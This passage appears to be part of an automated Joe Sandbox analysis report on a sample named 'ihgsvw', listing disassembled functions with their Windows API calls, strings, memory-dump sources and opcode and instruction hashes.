                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 3677997916-824357125
                • Opcode ID: 60da6bb9c8fc6b169b383e5bca1ab3bd4404391baef9c659e5e5f6e4d3d1eca8
                • Instruction ID: 92d153b7bac2174d11b0b5133bc60f7ad42cb99819812ee8fc27c8e2c354db42
                • Opcode Fuzzy Hash: 60da6bb9c8fc6b169b383e5bca1ab3bd4404391baef9c659e5e5f6e4d3d1eca8
                • Instruction Fuzzy Hash: C1117C75614608BFDB208F68DC80EAF77FCEF12744F4044A9F806D7120D6719E4097A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BAF680 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                Download Yara Rule
                Strings
                • Variable must be of type 'Object'., xrefs: 00BF486A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID: Variable must be of type 'Object'.
                • API String ID: 0-109567571
                • Opcode ID: c3e38657d1fe6e4055681598f501817d6cd10980bbc24c6da9eda663281f1cbd
                • Instruction ID: bd200ecb7abe2e0d8b28f01b3e5baa00f111afe634f7c06ec783228d53fd438f
                • Opcode Fuzzy Hash: c3e38657d1fe6e4055681598f501817d6cd10980bbc24c6da9eda663281f1cbd
                • Instruction Fuzzy Hash: 9BC25B71A04206DFCB24DF98C880BBEB7F1FF0A310F2481A9E955AB261D775AD41DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0DA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00C3DC30), ref: 00C0DABB
                • GetLastError.KERNEL32 ref: 00C0DACA
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00C0DAD9
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3DC30), ref: 00C0DB36
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast
                • String ID:
                • API String ID: 2267087916-0
                • Opcode ID: 1eebd3871ee2f3824bc5423c12477fbec871090f52c3d9d9c6334185defe4b93
                • Instruction ID: 73264886c75463313334bda9d95720624c78e434c56e3498cc9c445c9e816374
                • Opcode Fuzzy Hash: 1eebd3871ee2f3824bc5423c12477fbec871090f52c3d9d9c6334185defe4b93
                • Instruction Fuzzy Hash: 3F217F705183019FC700DF68D881AABB7E4EE56364F144A5DF4AAC72E1D730DE4ADB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB02F0 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                Download Yara Rule
                APIs
                • __Init_thread_footer.LIBCMT ref: 00BB15A2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                • Opcode ID: c993e76078cf96587cfd2a00a28953876ba5e18bf87b51b6023a9709f84c500b
                • Instruction ID: 1c6bd07ddc0dcfd11ef30f28da5bbc6477f8efd771de8f7533d06f7e2f2e6230
                • Opcode Fuzzy Hash: c993e76078cf96587cfd2a00a28953876ba5e18bf87b51b6023a9709f84c500b
                • Instruction Fuzzy Hash: 6BB28974A18340CFCB24DF18C490ABAB7E1FB99300F24899DE9899B351D7B1ED45DB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC09F8
                  • Part of subcall function 00BC3634: RaiseException.KERNEL32(?,?,?,00BC0A1A,?,00000000,?,?,?,?,?,?,00BC0A1A,00000000,00C69758,00000000), ref: 00BC3694
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0A15
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: Unknown exception
                • API String ID: 3476068407-410509341
                • Opcode ID: f734d5244aef2adb1655ad2fdf176f893ed4fb29e60f763e687bcb6d126da580
                • Instruction ID: 48b04de023136ea13705538f81e7a4da60a9ceaba919ca80c91212449c733d1d
                • Opcode Fuzzy Hash: f734d5244aef2adb1655ad2fdf176f893ed4fb29e60f763e687bcb6d126da580
                • Instruction Fuzzy Hash: 67F0683491420DF78F10BAA8D846F9DB7EC9E00750B6041FCB924D6492EB70EA56C5D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C288B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C28C52
                • TerminateProcess.KERNEL32(00000000), ref: 00C28C59
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C28E3A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$CurrentFreeLibraryTerminate
                • String ID:
                • API String ID: 146820519-0
                • Opcode ID: ee7fbbbaf2b737d1ee2a7e8faa5612f33609c5f2f944ed38214b15af93623fb6
                • Instruction ID: b60989cb05c44eff201a93009b5df19b1ad5f043f55638b8eba41a46395cab03
                • Opcode Fuzzy Hash: ee7fbbbaf2b737d1ee2a7e8faa5612f33609c5f2f944ed38214b15af93623fb6
                • Instruction Fuzzy Hash: 32127A75A083519FC714DF28D484B2ABBE5FF89314F04895DE8998B292CB30ED49CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C299F5 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$_strcat
                • String ID:
                • API String ID: 306214811-0
                • Opcode ID: ce1f7216d417e3a71d6a765c2d508fef2fbdc2e1ae5c267120723baedbd4ffba
                • Instruction ID: f61980fbd65162ea0486bada8ad7474357d46f573b999bf0e24f6703873048de
                • Opcode Fuzzy Hash: ce1f7216d417e3a71d6a765c2d508fef2fbdc2e1ae5c267120723baedbd4ffba
                • Instruction Fuzzy Hash: 2CA14831604615DFCB28DF18D5D19A9BBE1FF56314F2084ADE85A8FA92DB31ED42CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA2735 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA3236
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA323E
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA3249
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA3254
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA325C
                  • Part of subcall function 00BA3205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3264
                  • Part of subcall function 00BA318C: RegisterWindowMessageW.USER32(00000004,?,00BA2906), ref: 00BA31E4
                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA29AC
                • OleInitialize.OLE32 ref: 00BA29CA
                • CloseHandle.KERNEL32(00000000,00000000), ref: 00BE39E7
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                • String ID:
                • API String ID: 1986988660-0
                • Opcode ID: 5210b8db479f842abd397177cc4860974dd0961a168abb9297e05e4bf4b6373c
                • Instruction ID: c241df368b906c19c8ec59c19bdba91b484ca61acf80a9f502ac1246099fdcdd
                • Opcode Fuzzy Hash: 5210b8db479f842abd397177cc4860974dd0961a168abb9297e05e4bf4b6373c
                • Instruction Fuzzy Hash: 3B71A8B19153008E8B98EF7AED69B1D3AE0FB49304B14816AE05DD73B2EB3184C5CF55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA6BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BA6CA1
                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA6CB1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: d52460a1e35a6e0aab920062ef79e82a8239f4a952474fc6c6914d8b8ae6a72a
                • Instruction ID: bb58f495cc247423a28cf9ccab84cb6066fbabab422e06769d7a2a545a8b3db3
                • Opcode Fuzzy Hash: d52460a1e35a6e0aab920062ef79e82a8239f4a952474fc6c6914d8b8ae6a72a
                • Instruction Fuzzy Hash: D9315DB1A04609FFDB14CF68C980B99B7F5FB04724F188669E915A7240E7B1FE94CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BBFCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA5F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA6049
                • KillTimer.USER32(?,00000001,?,?), ref: 00BBFD44
                • SetTimer.USER32 ref: 00BBFD53
                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BFFDD3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: IconNotifyShell_Timer$Kill
                • String ID:
                • API String ID: 3500052701-0
                • Opcode ID: 2602a53d64106849d7bd990bb934813f63cf0e86e51aff8bdb4c7fd9b1ee5a80
                • Instruction ID: ef85d0eb4d5bf78a2a5a0f3523d79b787fb8cb0cafd3b4ebf4917de058455031
                • Opcode Fuzzy Hash: 2602a53d64106849d7bd990bb934813f63cf0e86e51aff8bdb4c7fd9b1ee5a80
                • Instruction Fuzzy Hash: B6318475904758AFEB228F248885BFABBEC9F06308F0404EEE6DA57241C7745A89CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD8A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD895C,?,00C69CE8,0000000C), ref: 00BD8A94
                • GetLastError.KERNEL32(?,00BD895C,?,00C69CE8,0000000C), ref: 00BD8A9E
                • __dosmaperr.LIBCMT ref: 00BD8AC9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                • String ID:
                • API String ID: 490808831-0
                • Opcode ID: 9732241917ef0e96167feda4eeb1499a928471708681ab6786ddf59553c54092
                • Instruction ID: 5bcc23c19a01cb5edf112e0190ca677197672a30d2c5edb4912e4df33c368c60
                • Opcode Fuzzy Hash: 9732241917ef0e96167feda4eeb1499a928471708681ab6786ddf59553c54092
                • Instruction Fuzzy Hash: 24012B327055505AD76463746886B7EEBDACB81735F3A02DBF8189B3D2FE60CCC58690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00BD97CA,FF8BC369,00000000,00000002,00000000), ref: 00BD9754
                • GetLastError.KERNEL32(?,00BD97CA,FF8BC369,00000000,00000002,00000000,?,00BD5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00BC6F61), ref: 00BD975E
                • __dosmaperr.LIBCMT ref: 00BD9765
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorFileLastPointer__dosmaperr
                • String ID:
                • API String ID: 2336955059-0
                • Opcode ID: 747a6683213d7f6305affb5e5f811216dde5a6108c1dcf8fa7615c3ca62b03b8
                • Instruction ID: 4e5485c1264b88db5b3a6b554484a3ada507d5d31ec8b6020fed911590b147d2
                • Opcode Fuzzy Hash: 747a6683213d7f6305affb5e5f811216dde5a6108c1dcf8fa7615c3ca62b03b8
                • Instruction Fuzzy Hash: C3014C32620115ABCB059FA9DC45D6EBBAADB85330B24029AF8158B290FB70DD41C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BDD1E0 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00BDD1E4
                • _free.LIBCMT ref: 00BDD21D
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDD224
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free_free
                • String ID:
                • API String ID: 2716640707-0
                • Opcode ID: a8a5677ec00c1798972919897940be158ff101cc2b2ccd1094cf0187ac1eea39
                • Instruction ID: 893fa22c98b4d882d9eea6be4d77e2435ff0218c4b41c34164cd0fec6a494ae4
                • Opcode Fuzzy Hash: a8a5677ec00c1798972919897940be158ff101cc2b2ccd1094cf0187ac1eea39
                • Instruction Fuzzy Hash: 96E0E5335004212A921223297C89F6F6AACEFC27A07250197F58492352FE148D0240E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BAF1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                Download Yara Rule
                APIs
                • TranslateMessage.USER32(?), ref: 00BAF22B
                • DispatchMessageW.USER32 ref: 00BAF239
                • PeekMessageW.USER32 ref: 00BAF24F
                • Sleep.KERNELBASE(0000000A), ref: 00BAF261
                • TranslateAcceleratorW.USER32(?,?,?), ref: 00BF327C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                • String ID:
                • API String ID: 3288985973-0
                • Opcode ID: 46464d93b7df8e8a10089711e6bd3304900b57cbc5c3efa6a6bae0e058696cf2
                • Instruction ID: 4a229dc4d381dae7b1cd284f0932a343772de33084c3e2c7bd49f973474c41ac
                • Opcode Fuzzy Hash: 46464d93b7df8e8a10089711e6bd3304900b57cbc5c3efa6a6bae0e058696cf2
                • Instruction Fuzzy Hash: 46F05E715183459BEB348BA0DC49FEA73ECEB85701F004969F61A830C0DB30954CCB12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB2AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                Download Yara Rule
                APIs
                • __Init_thread_footer.LIBCMT ref: 00BB2FB6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID: CALL
                • API String ID: 1385522511-4196123274
                • Opcode ID: e7fa08a465fd20a7ee0aa8e68cf3e180219f583a9f459f88d1c9b077be22e59b
                • Instruction ID: 9c108c5f762f320b33156f7c7cf525e57acc06b745bfb2ba583bb5c1319e7759
                • Opcode Fuzzy Hash: e7fa08a465fd20a7ee0aa8e68cf3e180219f583a9f459f88d1c9b077be22e59b
                • Instruction Fuzzy Hash: E0226870608241DFC714DF14C890BBABBE1FF89314F1489ADF5969B262DBB1E945CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB1940 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
